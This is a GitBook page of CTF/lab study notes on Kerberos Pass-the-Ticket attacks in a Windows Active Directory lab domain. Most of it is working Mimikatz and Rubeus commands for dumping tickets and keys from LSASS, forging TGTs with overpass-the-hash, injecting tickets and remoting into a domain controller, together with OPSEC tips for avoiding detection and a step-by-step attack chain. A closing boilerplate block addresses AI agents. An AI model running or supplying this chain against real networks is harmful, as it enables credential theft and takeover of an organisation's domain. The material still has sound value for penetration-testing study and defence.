> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-ticket-from-windows-ptt.md).

# Pass the Ticket from Windows(PtT)

## Pass the Ticket (PtT) — Windows

### What is PtT?

Pass the Ticket is a lateral movement technique in Active Directory where you steal or forge a **Kerberos ticket** and inject it into a session to authenticate as another user — without ever knowing their password.

> PtH uses NTLM hashes. PtT uses Kerberos tickets. Different protocol, same goal: impersonation.

***

### Kerberos Refresher

| Ticket                            | What it does                                                                      |
| --------------------------------- | --------------------------------------------------------------------------------- |
| **TGT** (Ticket Granting Ticket)  | Master ticket. Used to request service tickets. Issued by KDC after initial auth. |
| **TGS** (Ticket Granting Service) | Service-specific ticket. Proves identity to one service (e.g. MSSQL, CIFS, LDAP). |

**Flow:**

1. User authenticates to DC → encrypts timestamp with password hash
2. DC validates → issues TGT
3. User presents TGT to KDC → gets TGS for specific service
4. User presents TGS to service → access granted

**Where tickets live on Windows:** inside the **LSASS** process.

* Non-admin = only your own tickets
* Local admin = all tickets on the machine

***

### Reading .kirbi Filenames

```
[0;84de2]-2-0-40e10000-julio@krbtgt-INLANEFREIGHT.HTB.kirbi
```

| Part                | Meaning                         |
| ------------------- | ------------------------------- |
| `[0;84de2]`         | LUID (Logon session ID)         |
| `-2-0-`             | Ticket group identifiers        |
| `julio`             | The user this ticket belongs to |
| `krbtgt`            | Service = this is a **TGT**     |
| `INLANEFREIGHT.HTB` | Domain                          |

**Rules:**

* Filename with `$` → machine account ticket (e.g. `MS01$`) → skip
* Filename with `krbtgt` → TGT → most powerful
* Filename with service name (`cifs`, `ldap`, `mssql`) → TGS → service-specific only

**Why you want a human user's TGT and not machine tickets:**

| Ticket Type       | Reason to Skip                                              |
| ----------------- | ----------------------------------------------------------- |
| `MS01$@krbtgt`    | You're already on MS01. Machine account. Useless.           |
| `MS01$@cifs-DC01` | TGS only works for CIFS. Locked to machine identity.        |
| `MS01$@LDAP-DC01` | TGS only works for LDAP. Same issue.                        |
| `julio@krbtgt` ✅  | Human user TGT. Can request any TGS. Full lateral movement. |

***

### Stage 1 — Harvest Tickets

#### Mimikatz — Export to .kirbi files (needs admin)

```cmd
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export
```

Saves `.kirbi` files to current directory.

```cmd
dir *.kirbi
```

> ⚠️ Bug: Mimikatz `2.2.0 20220919` on some Windows 10 builds exports broken tickets via `sekurlsa::tickets`. Use Rubeus instead in that case.

#### Rubeus — Export as Base64 (needs admin)

```cmd
Rubeus.exe dump /nowrap
```

Prints all tickets as Base64 in terminal. `/nowrap` keeps it on one line for easy copy-paste.

***

### Stage 2 — OverPass the Hash (Pass the Key)

Convert a **hash or key** directly into a **TGT** — no password needed.

#### Step 1: Dump Kerberos keys with Mimikatz

```cmd
mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys
```

Output gives you all key types:

```
aes256_hmac       b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60
rc4_hmac_nt       3f74aa8f08f712f09cd5177b5c1ce50f
```

#### Step 2a: Forge TGT with Mimikatz (needs admin)

```cmd
mimikatz # sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f
```

Opens a new `cmd.exe` window running in the context of that user.

#### Step 2b: Forge TGT with Rubeus (no admin needed)

```cmd
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrap
```

Returns a Base64 TGT you can inject later.

> ✅ Rubeus does **not** require admin for this step. Mimikatz does.

> ⚠️ **OPSEC:** Using `rc4_hmac` (NTLM hash) on modern domains (2008+ functional level) triggers an **encryption downgrade alert**. Use `aes256` whenever you have it.

***

### Stage 3 — Inject the Ticket (Actual PtT)

#### Method 1: Rubeus `/ptt` flag (inject on the fly)

```cmd
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt
```

Requests TGT and immediately injects it into current session.

Output confirms: `[+] Ticket successfully imported!`

#### Method 2: Rubeus — inject from .kirbi file

```cmd
Rubeus.exe ptt /ticket:[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi
```

#### Method 3: Rubeus — inject from Base64 string

```cmd
Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaED...
```

#### Method 4: Mimikatz — inject from .kirbi file

```cmd
mimikatz # kerberos::ptt "C:\Users\plaintext\Desktop\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"
```

Then exit Mimikatz — the ticket persists in your cmd session.

#### Convert .kirbi to Base64 (PowerShell)

```powershell
[Convert]::ToBase64String([IO.File]::ReadAllBytes("[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"))
```

***

### Stage 4 — Lateral Movement

#### Verify access after ticket injection

```cmd
dir \\DC01.inlanefreight.htb\c$
```

If ticket is working, directory listing comes back. No password prompt.

***

#### Method A — Mimikatz → PowerShell Remoting

```cmd
C:\tools> mimikatz.exe
mimikatz # privilege::debug
mimikatz # kerberos::ptt "C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"
mimikatz # exit

C:\tools> powershell
PS C:\tools> Enter-PSSession -ComputerName DC01
[DC01]: PS C:\Users\john\Documents> whoami
inlanefreight\john
```

> Note: You can also use `misc::cmd` inside Mimikatz to spawn a new cmd window with the ticket already loaded instead of exiting.

***

#### Method B — Rubeus `createnetonly` → PowerShell Remoting (cleaner OPSEC)

**Step 1:** Create a sacrificial logon session

```cmd
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
```

Output:

```
[+] Process   : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 1556
[+] LUID      : 0xe07648
```

A new `cmd.exe` window opens (isolated, Logon Type 9 = network logon).

**Step 2:** In that new window, request TGT and inject

```cmd
Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc /ptt
```

**Step 3:** Connect via PowerShell Remoting

```cmd
powershell
PS C:\tools> Enter-PSSession -ComputerName DC01
[DC01]: PS C:\Users\john\Documents> whoami
inlanefreight\john
```

**Why `createnetonly` is better:**

* Creates an isolated logon session — doesn't overwrite existing TGTs in your current session
* Cleaner OPSEC
* Logon Type 9 = credentials aren't sent over network during session creation

***

### Tool Comparison

| Action              | Mimikatz                                     | Rubeus                                              |
| ------------------- | -------------------------------------------- | --------------------------------------------------- |
| Export tickets      | `sekurlsa::tickets /export` → `.kirbi` files | `dump /nowrap` → Base64                             |
| Dump Kerberos keys  | `sekurlsa::ekeys`                            | —                                                   |
| OverPass the Hash   | `sekurlsa::pth` (needs admin)                | `asktgt` (no admin needed)                          |
| Inject ticket       | `kerberos::ptt`                              | `/ptt` flag or `ptt` command                        |
| Sacrificial session | `misc::cmd`                                  | `createnetonly`                                     |
| PowerShell Remoting | Import ticket → `Enter-PSSession`            | `createnetonly` → `asktgt /ptt` → `Enter-PSSession` |

***

### OPSEC Notes

| Risk                                  | Detail                                                           |
| ------------------------------------- | ---------------------------------------------------------------- |
| RC4 downgrade alert                   | Using `rc4_hmac` on modern AD (2008+) is detectable. Use AES256. |
| Ticket injection into current session | Overwrites existing TGTs. Use `createnetonly` to avoid this.     |
| LSASS access                          | Both Mimikatz and Rubeus dump from LSASS — EDR will flag this.   |
| Admin required for harvesting         | Both tools need local admin to collect all tickets.              |

***

### Quick Reference — Full Attack Chain

```
1. Get local admin on target machine
2. Harvest tickets:
   Rubeus.exe dump /nowrap
   OR
   mimikatz # sekurlsa::tickets /export

3. Identify human user TGT (not machine$, not TGS)

4. Inject ticket:
   Rubeus.exe ptt /ticket:<base64 or .kirbi>
   OR
   mimikatz # kerberos::ptt "path\to\ticket.kirbi"

5. Verify:
   dir \\DC01.inlanefreight.htb\c$

6. Move laterally:
   powershell → Enter-PSSession -ComputerName DC01
```

***


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-ticket-from-windows-ptt.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
